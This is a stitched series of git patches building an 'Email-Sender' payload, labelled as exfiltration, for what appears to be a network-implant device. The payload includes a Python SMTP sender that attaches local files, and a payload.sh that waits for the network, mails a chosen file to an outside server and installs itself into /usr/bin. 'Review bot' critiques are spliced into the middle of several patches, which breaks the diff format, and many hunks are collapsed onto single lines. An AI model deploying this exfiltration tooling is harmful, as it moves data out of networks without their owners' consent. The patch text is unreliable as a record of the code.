From a277a4493b041b5012e0b95eb68edcb384be855c Mon Sep 17 00:00:00 2001
From: TheDragonkeeper
Date: Sat, 4 Nov 2017 12:43:20 +0000
Subject: [PATCH 01/21] Lets Send Packages Of Nuts ! Here is my extension for sending emails; also includes sending files and html format.
---
payloads/extensions/sendemail.py | 72 ++++++++++++++++++++++++++++++++
1 file changed, 72 insertions(+)
create mode 100644 payloads/extensions/sendemail.py
diff --git a/payloads/extensions/sendemail.py b/payloads/extensions/sendemail.py
new file mode 100644
index 0000000..0cf3fd7
--- /dev/null
+++ b/payloads/extensions/sendemail.py
@@ -0,0 +1,72 @@
+import smtplib, os
+from email.MIMEMultipart import MIMEMultipart
+from email.MIMEBase import MIMEBase
+from email.MIMEText import MIMEText
+from email.MIMEImage import MIMEImage
+from email.Utils import COMMASPACE, formatdate
+from email import Encoders
+import ConfigParser
+
+def send_mail(send_from, send_to, subject, text, files=None,
+ data_attachments=None, server="None", port=587,
+ tls=True, html=False, images=None,
+ username=None, password=None,
+ config_file=None, config=None):
+
+ if files is None:
+ files = []
+
+ if images is None:
+ images = []
+
+ if data_attachments is None:
+ data_attachments = []
+
+ if config_file is not None:
+ config = ConfigParser.ConfigParser()
+ config.read(config_file)
+
+ if config is not None:
+ server = config.get('smtp', 'server')
+ port = config.get('smtp', 'port')
+ tls = config.get('smtp', 'tls').lower() in ('true', 'yes', 'y')
+ username = config.get('smtp', 'username')
+ password = config.get('smtp', 'password')
+
+ msg = MIMEMultipart('related')
+ msg['From'] = send_from
+ msg['To'] = send_to if isinstance(send_to, basestring) else COMMASPACE.join(send_to)
+ msg['Date'] = formatdate(localtime=True)
+ msg['Subject'] = subject
+
+ msg.attach( MIMEText(text, 'html' if html else 'plain') )
+
+ for f in files:
+ part = MIMEBase('application', "octet-stream")
+ part.set_payload( open(f,"rb").read() )
+ Encoders.encode_base64(part)
+ part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(f))
+ msg.attach(part)
+
+ for f in data_attachments:
+ part = MIMEBase('application', "octet-stream")
+ part.set_payload( f['data'] )
+ Encoders.encode_base64(part)
+ part.add_header('Content-Disposition', 'attachment; filename="%s"' % f['filename'])
+ msg.attach(part)
+
+ for (n, i) in enumerate(images):
+ fp = open(i, 'rb')
+ msgImage = MIMEImage(fp.read())
+ fp.close()
+ msgImage.add_header('Content-ID', ''.format(str(n+1)))
+ msg.attach(msgImage)
+
+ smtp = smtplib.SMTP(server, int(port))
+ if tls:
+ smtp.starttls()
+
+ if username is not None:
+ smtp.login(username, password)
+ smtp.sendmail(send_from, send_to, msg.as_string())
+ smtp.close()
From 9339c283218f74d36816f1f16bc3ca94141c53d7 Mon Sep 17 00:00:00 2001
From: TheDragonkeeper
Date: Sat, 4 Nov 2017 12:49:48 +0000
Subject: [PATCH 02/21] Sending Emails This is an example the call the libraries make to the extension to send the mail.
---
payloads/library/exfiltration/Email-Sender/sendmail.py | 9 +++++++++
1 file changed, 9 insertions(+)
create mode 100644 payloads/library/exfiltration/Email-Sender/sendmail.py
diff --git a/payloads/library/exfiltration/Email-Sender/sendmail.py b/payloads/library/exfiltration/Email-Sender/sendmail.py
new file mode 100644
index 0000000..4064485
--- /dev/null
+++ b/payloads/library/exfiltration/Email-Sender/sendmail.py
@@ -0,0 +1,9 @@
+import sys
+sys.path.append("/root/extensions")
+from sendemail.py import send_mail
+
+send_mail('im-just-a-squirrel@giving-you-my-nuts.net', 'EmailTo@SendTo.net',
+ 'You Got My Nuts',
+ 'Enjoy this package',
+ files=["/Path/To/My/Nuts.txt"],
+ server='MAIL.SERVER.com', username='USERNAME', password='PASSWORD')
From bb9a6ade58a1342d8d70c4dfc0a0bc67e0421abf Mon Sep 17 00:00:00 2001
From: TheDragonkeeper
Date: Sat, 4 Nov 2017 12:56:08 +0000
Subject: [PATCH 03/21] Update sendmail.py
---
payloads/library/exfiltration/Email-Sender/sendmail.py | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/payloads/library/exfiltration/Email-Sender/sendmail.py b/payloads/library/exfiltration/Email-Sender/sendmail.py
index 4064485..04c8e1e 100644
--- a/payloads/library/exfiltration/Email-Sender/sendmail.py
+++ b/payloads/library/exfiltration/Email-Sender/sendmail.py
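Review bot: At the end of send_mail, `smtp.login(username, password)` runs whether or not `smtp.starttls()` was called, so with `tls` false (the parameter, or `tls` in the `[smtp]` config section) the password is sent over an unencrypted connection, and the connection is never closed if `login` or `sendmail` raises. The imports (`email.MIMEMultipart`, `ConfigParser`) and `basestring` make this Python 2 only, where `starttls()` accepts no SSL context, so the server certificate is presumably not verified; a Python 3 port could pass `context=ssl.create_default_context()`. In the `files` loop `open(f,"rb").read()` never closes the file, and in the `data_attachments` loop a quote or line break in `f['filename']` ends up unescaped in the header, which `part.add_header('Content-Disposition', 'attachment', filename=f['filename'])` avoids. The fence below covers only the SMTP session.

```python
    # … unchanged: message assembly and attachment loops …
    smtp = smtplib.SMTP(server, int(port))
    try:
        if tls:
            smtp.starttls()
        elif username is not None:
            raise ValueError("refusing to send SMTP credentials without TLS")
        if username is not None:
            smtp.login(username, password)
        smtp.sendmail(send_from, send_to, msg.as_string())
    finally:
        smtp.close()
```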
@@ -1,3 +1,11 @@ +# Title: Email-Sender +# Description: Allows sending emails to a mail server, with file support +# this is used coupled with the extension +# Author: TheDragonkeeper +# Version: 1.0 +# Category: exfiltration +# Target: Any + import sys sys.path.append("/root/extensions") from sendemail.py import send_mail From c15d894b0adbebaeb7ec89273a90ee874bc6c746 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 12:57:20 +0000 Subject: [PATCH 04/21] Update sendemail.py --- payloads/extensions/sendemail.py | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/payloads/extensions/sendemail.py b/payloads/extensions/sendemail.py index 0cf3fd7..c26d45f 100644 --- a/payloads/extensions/sendemail.py +++ b/payloads/extensions/sendemail.py @@ -1,3 +1,11 @@ +# Title: Email-Sender +# Description: Allows sending emails to a mail server, with file support +# this is called using the Email-Sender library +# Author: TheDragonkeeper +# Version: 1.0 +# Category: exfiltration +# Target: Any + import smtplib, os from email.MIMEMultipart import MIMEMultipart from email.MIMEBase import MIMEBase From 386f4e58aff5b811742de792a9918f936ef09fd0 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 13:18:11 +0000 Subject: [PATCH 05/21] whoops --- payloads/library/exfiltration/Email-Sender/sendmail.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Email-Sender/sendmail.py b/payloads/library/exfiltration/Email-Sender/sendmail.py index 04c8e1e..d209d31 100644 --- a/payloads/library/exfiltration/Email-Sender/sendmail.py +++ b/payloads/library/exfiltration/Email-Sender/sendmail.py @@ -8,7 +8,7 @@ import sys sys.path.append("/root/extensions") -from sendemail.py import send_mail +from sendemail import send_mail send_mail('im-just-a-squirrel@giving-you-my-nuts.net', 'EmailTo@SendTo.net', 'You Got My Nuts', From 8f434d2dab27d5b89a0c705bdb483a501157a9ff Mon Sep 17 00:00:00 2001 
From: TheDragonkeeper Date: Sat, 4 Nov 2017 15:56:40 +0000 Subject: [PATCH 06/21] Made changes so python can take bash parameters --- .../exfiltration/Email-Sender/sendmail.py | 22 ++++++++++--------- 1 file changed, 12 insertions(+), 10 deletions(-) diff --git a/payloads/library/exfiltration/Email-Sender/sendmail.py b/payloads/library/exfiltration/Email-Sender/sendmail.py index d209d31..8033319 100644 --- a/payloads/library/exfiltration/Email-Sender/sendmail.py +++ b/payloads/library/exfiltration/Email-Sender/sendmail.py @@ -1,17 +1,19 @@ -# Title: Email-Sender +# Title: Email-Sender # Description: Allows sending emails to a mail server, with file support -# this is used coupled with the extension -# Author: TheDragonkeeper -# Version: 1.0 +# this is used coupled with the extension +# Author: TheDragonkeeper +# Version: 1.0 # Category: exfiltration -# Target: Any +# Target: Any + import sys sys.path.append("/root/extensions") from sendemail import send_mail -send_mail('im-just-a-squirrel@giving-you-my-nuts.net', 'EmailTo@SendTo.net', - 'You Got My Nuts', - 'Enjoy this package', - files=["/Path/To/My/Nuts.txt"], - server='MAIL.SERVER.com', username='USERNAME', password='PASSWORD') +send_mail(sys.argv[1], sys.argv[2], + sys.argv[3], + sys.argv[4], +# files=sys.argv[8], + server=sys.argv[5], username=sys.argv[6], password=sys.argv[7]) +) From bb175fc269f63ecf0c2366d8c929cccf61bbcf4a Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 16:00:57 +0000 Subject: [PATCH 07/21] Example of sending email with bash variables --- .../exfiltration/Email-Sender/payload.sh | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 payloads/library/exfiltration/Email-Sender/payload.sh diff --git a/payloads/library/exfiltration/Email-Sender/payload.sh b/payloads/library/exfiltration/Email-Sender/payload.sh new file mode 100644 index 0000000..bb007e1 --- /dev/null +++ b/payloads/library/exfiltration/Email-Sender/payload.sh 
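Review bot: `password=sys.argv[7]` takes the SMTP password from the command line, where other local users can read it in the process list while the script runs and where it tends to end up in shell history and logs. `send_mail` already accepts `config_file`, so the script could take the path of a root-only `[smtp]` config file instead, e.g. `send_mail(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], config_file=sys.argv[5])`. The `)` on its own line after the call is also a syntax error as committed (patch 09 later removes it), and nothing checks that enough arguments were supplied before indexing `sys.argv`.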
@@ -0,0 +1,17 @@ +function run() { + LED STAGE1 + SWITCH_POS=$(SWITCH) + until ping -c 1 8.8.8.8 >/dev/null ; do : ; done + SUBJECT='Im Just Nutty' + BODY='And your network is nutty too.' + RCPT="recieving email" + FROM="your email" + SERVER="server.com" + USER="username" + PASS="password" + python /root/payloads/$SWITCH_POS/sendmail.py $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS + LED FINISH +} + +NETMODE NAT +run From d9d1117d82877f5b18c35fc5c06bbe8ce72aa4ca Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 16:08:44 +0000 Subject: [PATCH 08/21] Create README.md --- .../library/exfiltration/Email-Sender/README.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 payloads/library/exfiltration/Email-Sender/README.md diff --git a/payloads/library/exfiltration/Email-Sender/README.md b/payloads/library/exfiltration/Email-Sender/README.md new file mode 100644 index 0000000..4f62cc3 --- /dev/null +++ b/payloads/library/exfiltration/Email-Sender/README.md @@ -0,0 +1,13 @@ +| | | +|:----------------|:---------------------------------------------------------------------------------------------------| +| **Title** | Email-Sender | +| **Description** | Sends emails / has html and file support / it can be used with bash and python . | + **Author** | TheDragonkeeper | +| **Version** | 1.0 | +| **Category** | Exfiltration | +| **Target** | Any | + +| Meaning | Color | Description | +|:----------|:-----------------:|:----------------------------| +| SUCCESS: | Blink Green | Payload ended complete | +| SETUP: | Blink Yellow | Payload is waiting on network | From 95c54d273949c582898298cbc8c817dddaa27da4 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 16:34:35 +0000 Subject: [PATCH 09/21] workaround for bash sending file --- payloads/library/exfiltration/Email-Sender/sendmail.py | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) 
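Review bot: `$FROM $RCPT $SERVER $USER $PASS` are expanded unquoted on the `python … sendmail.py` line, so any value containing whitespace or glob characters is split or expanded and shifts every later positional argument; the placeholder `RCPT="recieving email"` already contains a space. Quote every expansion: `python "/root/payloads/$SWITCH_POS/sendmail.py" "$FROM" "$RCPT" "$SUBJECT" "$BODY" "$SERVER" "$USER" "$PASS"`. Assigning `USER` also overwrites the shell's standard login-name variable, so a name such as `SMTP_USER` is safer, and the `until ping …` loop has no delay or retry limit while the network is down. The same unquoted expansions recur in the payload.sh hunks of patches 10 and 17.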
diff --git a/payloads/library/exfiltration/Email-Sender/sendmail.py b/payloads/library/exfiltration/Email-Sender/sendmail.py index 8033319..b26e7e8 100644 --- a/payloads/library/exfiltration/Email-Sender/sendmail.py +++ b/payloads/library/exfiltration/Email-Sender/sendmail.py @@ -11,9 +11,13 @@ import sys sys.path.append("/root/extensions") from sendemail import send_mail -send_mail(sys.argv[1], sys.argv[2], +if len(sys.argv) > 8: + send_mail(sys.argv[1], sys.argv[2], + sys.argv[3], + sys.argv[4], + server=sys.argv[5], username=sys.argv[6], password=sys.argv[7], files=[sys.argv[8]]) +else: + send_mail(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], -# files=sys.argv[8], server=sys.argv[5], username=sys.argv[6], password=sys.argv[7]) -) From e278b53fa1e2ce2d137252d6f1253681c40d26ff Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 16:40:13 +0000 Subject: [PATCH 10/21] Update payload.sh --- payloads/library/exfiltration/Email-Sender/payload.sh | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Email-Sender/payload.sh b/payloads/library/exfiltration/Email-Sender/payload.sh index bb007e1..d978275 100644 --- a/payloads/library/exfiltration/Email-Sender/payload.sh +++ b/payloads/library/exfiltration/Email-Sender/payload.sh @@ -9,7 +9,9 @@ function run() { SERVER="server.com" USER="username" PASS="password" - python /root/payloads/$SWITCH_POS/sendmail.py $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS + FILE="/some/File/Path/1.txt" + python /root/payloads/$SWITCH_POS/sendmail.py $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS "$FILE" + ####### REMOVE THE FILE VAR FROM THE PYTHON COMMAND IF YOU HAVE NO PATH LED FINISH } From 66bd94489babd04b8f8eef3246c00202aeb729ae Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 22:46:07 +0000 Subject: [PATCH 11/21] Update sendemail.py --- payloads/extensions/sendemail.py | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) 
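Review bot: Only `len(sys.argv) > 8` is tested, so a call with fewer than seven arguments still reaches `sys.argv[7]` in the `else` branch and ends in an IndexError traceback rather than a usage message. The two `send_mail(...)` calls differ only in `files=`, so a single call is enough: `files = [sys.argv[8]] if len(sys.argv) > 8 else None` followed by one `send_mail(..., files=files)`, preceded by `if len(sys.argv) < 8: sys.exit("usage: ...")`. The same block is copied into sendemail.py in patch 11.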
diff --git a/payloads/extensions/sendemail.py b/payloads/extensions/sendemail.py index c26d45f..299d261 100644 --- a/payloads/extensions/sendemail.py +++ b/payloads/extensions/sendemail.py @@ -5,7 +5,7 @@ # Version: 1.0 # Category: exfiltration # Target: Any - +import sys import smtplib, os from email.MIMEMultipart import MIMEMultipart from email.MIMEBase import MIMEBase @@ -78,3 +78,15 @@ def send_mail(send_from, send_to, subject, text, files=None, smtp.login(username, password) smtp.sendmail(send_from, send_to, msg.as_string()) smtp.close() + + +if len(sys.argv) > 8: + send_mail(sys.argv[1], sys.argv[2], + sys.argv[3], + sys.argv[4], + server=sys.argv[5], username=sys.argv[6], password=sys.argv[7], files=[sys.argv[8]]) +else: + send_mail(sys.argv[1], sys.argv[2], + sys.argv[3], + sys.argv[4], +server=sys.argv[5], username=sys.argv[6], password=sys.argv[7]) From 67615c5b59497c32480be8b6e7c0bdbe03ccb815 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 22:47:28 +0000 Subject: [PATCH 12/21] Rename payloads/extensions/sendemail.py to payloads/library/exfiltration/Email-Sender/sendemail.py --- .../exfiltration/Email-Sender}/sendemail.py | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename payloads/{extensions => library/exfiltration/Email-Sender}/sendemail.py (100%) diff --git a/payloads/extensions/sendemail.py b/payloads/library/exfiltration/Email-Sender/sendemail.py similarity index 100% rename from payloads/extensions/sendemail.py rename to payloads/library/exfiltration/Email-Sender/sendemail.py From 06636402fdafb9abc953ad2ad91d53e0439d8159 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 22:47:45 +0000 Subject: [PATCH 13/21] Delete sendmail.py --- .../exfiltration/Email-Sender/sendmail.py | 23 ------------------- 1 file changed, 23 deletions(-) delete mode 100644 payloads/library/exfiltration/Email-Sender/sendmail.py 
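Review bot: The `if len(sys.argv) > 8:` block is added at module level with no `if __name__ == "__main__":` guard, so any script that does `from sendemail import send_mail` will try to send a message, or fail on `sys.argv[5]`, at import time. Wrap the block in `if __name__ == "__main__":` and indent it. The final `server=sys.argv[5], ...` continuation line appears to start at column 0 in the patch, which is legal inside the open parenthesis but reads like a separate statement.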
diff --git a/payloads/library/exfiltration/Email-Sender/sendmail.py b/payloads/library/exfiltration/Email-Sender/sendmail.py deleted file mode 100644 index b26e7e8..0000000 --- a/payloads/library/exfiltration/Email-Sender/sendmail.py +++ /dev/null @@ -1,23 +0,0 @@ -# Title: Email-Sender -# Description: Allows sending emails to a mail server, with file support -# this is used coupled with the extension -# Author: TheDragonkeeper -# Version: 1.0 -# Category: exfiltration -# Target: Any - - -import sys -sys.path.append("/root/extensions") -from sendemail import send_mail - -if len(sys.argv) > 8: - send_mail(sys.argv[1], sys.argv[2], - sys.argv[3], - sys.argv[4], - server=sys.argv[5], username=sys.argv[6], password=sys.argv[7], files=[sys.argv[8]]) -else: - send_mail(sys.argv[1], sys.argv[2], - sys.argv[3], - sys.argv[4], - server=sys.argv[5], username=sys.argv[6], password=sys.argv[7]) From dca44c372624c34ee10673489330436df7c1acfe Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 22:58:21 +0000 Subject: [PATCH 14/21] Create SENDMAIL --- payloads/library/exfiltration/Email-Sender/SENDMAIL | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 payloads/library/exfiltration/Email-Sender/SENDMAIL diff --git a/payloads/library/exfiltration/Email-Sender/SENDMAIL b/payloads/library/exfiltration/Email-Sender/SENDMAIL new file mode 100644 index 0000000..f8228f1 --- /dev/null +++ b/payloads/library/exfiltration/Email-Sender/SENDMAIL @@ -0,0 +1,2 @@ +[[ -z $8 ]] && python /usr/bin/sendemail.py "$1" "$2" "$3" "$4" "$5" "$6" "$7" +[[ ! -z $8 ]] && python /usr/bin/sendemail.py "$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8" From c8fb34d29e2b8062abfff3e4b1af5cfd905c5112 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 23:03:13 +0000 Subject: [PATCH 15/21] Create install --- payloads/library/exfiltration/Email-Sender/install | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 payloads/library/exfiltration/Email-Sender/install 
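Review bot: When `$8` is empty the last command the script runs is the failing test `[[ ! -z $8 ]]`, so SENDMAIL exits with status 1 even though the first line sent the mail, and callers cannot tell success from failure. An `if [[ -z $8 ]]; then … else … fi` around the two `python /usr/bin/sendemail.py` calls would return python's own exit status. The file also has no `#!/bin/bash` line although `[[` is a bash construct (patch 16 adds one).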
diff --git a/payloads/library/exfiltration/Email-Sender/install b/payloads/library/exfiltration/Email-Sender/install new file mode 100644 index 0000000..4d223b0 --- /dev/null +++ b/payloads/library/exfiltration/Email-Sender/install @@ -0,0 +1,7 @@ +#!/bin/bash + +if [ ! -f /usr/bin/SENDMAIL ]; then + mv sendemail.py /usr/bin/ + mv SENDMAIL /usr/bin/ + chmod +rx /usr/bin/SENDMAIL +fi From 349d442f5bc41f13f8a72302698ee529b2f654d8 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 23:05:11 +0000 Subject: [PATCH 16/21] Update SENDMAIL --- payloads/library/exfiltration/Email-Sender/SENDMAIL | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/payloads/library/exfiltration/Email-Sender/SENDMAIL b/payloads/library/exfiltration/Email-Sender/SENDMAIL index f8228f1..85224a7 100644 --- a/payloads/library/exfiltration/Email-Sender/SENDMAIL +++ b/payloads/library/exfiltration/Email-Sender/SENDMAIL @@ -1,2 +1,7 @@ +#!/bin/bash + [[ -z $8 ]] && python /usr/bin/sendemail.py "$1" "$2" "$3" "$4" "$5" "$6" "$7" [[ ! -z $8 ]] && python /usr/bin/sendemail.py "$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8" + +### $1 $2 $3 $4 $5 $6 $7 $8 +### $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS "$FILE" From bfd5d2a29ddfb4d6ddf60dd1282900295f0ae88b Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 23:07:08 +0000 Subject: [PATCH 17/21] Update payload.sh --- payloads/library/exfiltration/Email-Sender/payload.sh | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Email-Sender/payload.sh b/payloads/library/exfiltration/Email-Sender/payload.sh index d978275..de95f00 100644 --- a/payloads/library/exfiltration/Email-Sender/payload.sh +++ b/payloads/library/exfiltration/Email-Sender/payload.sh @@ -1,3 +1,5 @@ +#!/bin/bash + function run() { LED STAGE1 SWITCH_POS=$(SWITCH) 
@@ -10,10 +12,17 @@ function run() { USER="username" PASS="password" FILE="/some/File/Path/1.txt" - python /root/payloads/$SWITCH_POS/sendmail.py $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS "$FILE" + SENDMAIL $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS "$FILE" ####### REMOVE THE FILE VAR FROM THE PYTHON COMMAND IF YOU HAVE NO PATH LED FINISH } + +if [ ! -f /usr/bin/SENDMAIL ]; then + mv sendemail.py /usr/bin/ + mv SENDMAIL /usr/bin/ + chmod +rx /usr/bin/SENDMAIL +fi + NETMODE NAT run From fd4fc8147de540026c936401abf64b9cfdda9871 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 23:07:20 +0000 Subject: [PATCH 18/21] Delete install --- payloads/library/exfiltration/Email-Sender/install | 7 ------- 1 file changed, 7 deletions(-) delete mode 100644 payloads/library/exfiltration/Email-Sender/install diff --git a/payloads/library/exfiltration/Email-Sender/install b/payloads/library/exfiltration/Email-Sender/install deleted file mode 100644 index 4d223b0..0000000 --- a/payloads/library/exfiltration/Email-Sender/install +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -if [ ! -f /usr/bin/SENDMAIL ]; then - mv sendemail.py /usr/bin/ - mv SENDMAIL /usr/bin/ - chmod +rx /usr/bin/SENDMAIL -fi From 4f3c8d5e5504755830d621d4c80849fda95510b4 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 23:23:44 +0000 Subject: [PATCH 19/21] Updated to run from /usr/bin --- .../exfiltration/Email-Sender/README.md | 24 ++++++++++++++++++- 1 file changed, 23 insertions(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Email-Sender/README.md b/payloads/library/exfiltration/Email-Sender/README.md index 4f62cc3..e3b598b 100644 --- a/payloads/library/exfiltration/Email-Sender/README.md +++ b/payloads/library/exfiltration/Email-Sender/README.md 
@@ -3,7 +3,7 @@ | **Title** | Email-Sender | | **Description** | Sends emails / has html and file support / it can be used with bash and python . | **Author** | TheDragonkeeper | -| **Version** | 1.0 | +| **Version** | 1.1 | | **Category** | Exfiltration | | **Target** | Any | @@ -11,3 +11,25 @@ |:----------|:-----------------:|:----------------------------| | SUCCESS: | Blink Green | Payload ended complete | | SETUP: | Blink Yellow | Payload is waiting on network | + +| Command | Arguments | +:----------|:-----------------| +| SENDMAIL | $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS "$FILE" | + + +Running the payload will install the command to /usr/bin +this will allow you to use the command SENDMAIL to send an email using your bash payload +the default arguments are as follows. + + + +| $1 | $2 | $3 | $4 | $5 | $6 | $7 | $8 +|:----------|:----------|:-----------------|:----------|:----------|:-----------------|:----------|:-----------------:| +| $FROM |$RCPT |"$SUBJECT"| "$BODY"| $SERVER | $USER | $PASS |"$FILE" | + + +if you wish to hard code one of these values you can simply edit the SENDMAIL file and then drop the numbers down a value; +i.e if you change $1 to 'thisismyemail@somedomain.net' then $2 now needs to be $1 + +The other option is to edit the python file 'sendemail.py' and change the corresponding sys.argv[1] in the same way. +but then you need to make sure you also edit the SENDMAIL to only send the amount of arguments needed. From ad23510242307ead64e13ad5cce1cd61190453b1 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 23:25:57 +0000 Subject: [PATCH 20/21] Update payload.sh --- payloads/library/exfiltration/Email-Sender/payload.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/exfiltration/Email-Sender/payload.sh b/payloads/library/exfiltration/Email-Sender/payload.sh index de95f00..0418657 100644 --- a/payloads/library/exfiltration/Email-Sender/payload.sh 
+++ b/payloads/library/exfiltration/Email-Sender/payload.sh @@ -19,8 +19,8 @@ function run() { if [ ! -f /usr/bin/SENDMAIL ]; then - mv sendemail.py /usr/bin/ - mv SENDMAIL /usr/bin/ + mv /root/payloads/$(SWITCH)/sendemail.py /usr/bin/ + mv /root/payloads/$(SWITCH)/SENDMAIL /usr/bin/ chmod +rx /usr/bin/SENDMAIL fi From 8615e340fc1eca616ffc4e872f10ce93497e80cd Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 23:27:51 +0000 Subject: [PATCH 21/21] Update sendemail.py --- payloads/library/exfiltration/Email-Sender/sendemail.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Email-Sender/sendemail.py b/payloads/library/exfiltration/Email-Sender/sendemail.py index 299d261..5285a11 100644 --- a/payloads/library/exfiltration/Email-Sender/sendemail.py +++ b/payloads/library/exfiltration/Email-Sender/sendemail.py @@ -2,7 +2,7 @@ # Description: Allows sending emails to a mail server, with file support # this is called using the Email-Sender library # Author: TheDragonkeeper -# Version: 1.0 +# Version: 1.1 # Category: exfiltration # Target: Any import sys
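Review bot: Neither `mv` result is checked and the guard only tests for `/usr/bin/SENDMAIL`, so if moving `sendemail.py` fails the wrapper is still installed, every later run skips the install, and SENDMAIL points at a missing script. Because `mv` removes the files from the payload directory and the guard skips once SENDMAIL exists, an updated copy placed there later is never installed. Prefer copying with quoted paths chained by `&&`, e.g. `cp "/root/payloads/$(SWITCH)/sendemail.py" /usr/bin/ && cp "/root/payloads/$(SWITCH)/SENDMAIL" /usr/bin/ && chmod +rx /usr/bin/SENDMAIL`, and test for both installed files in the `if`.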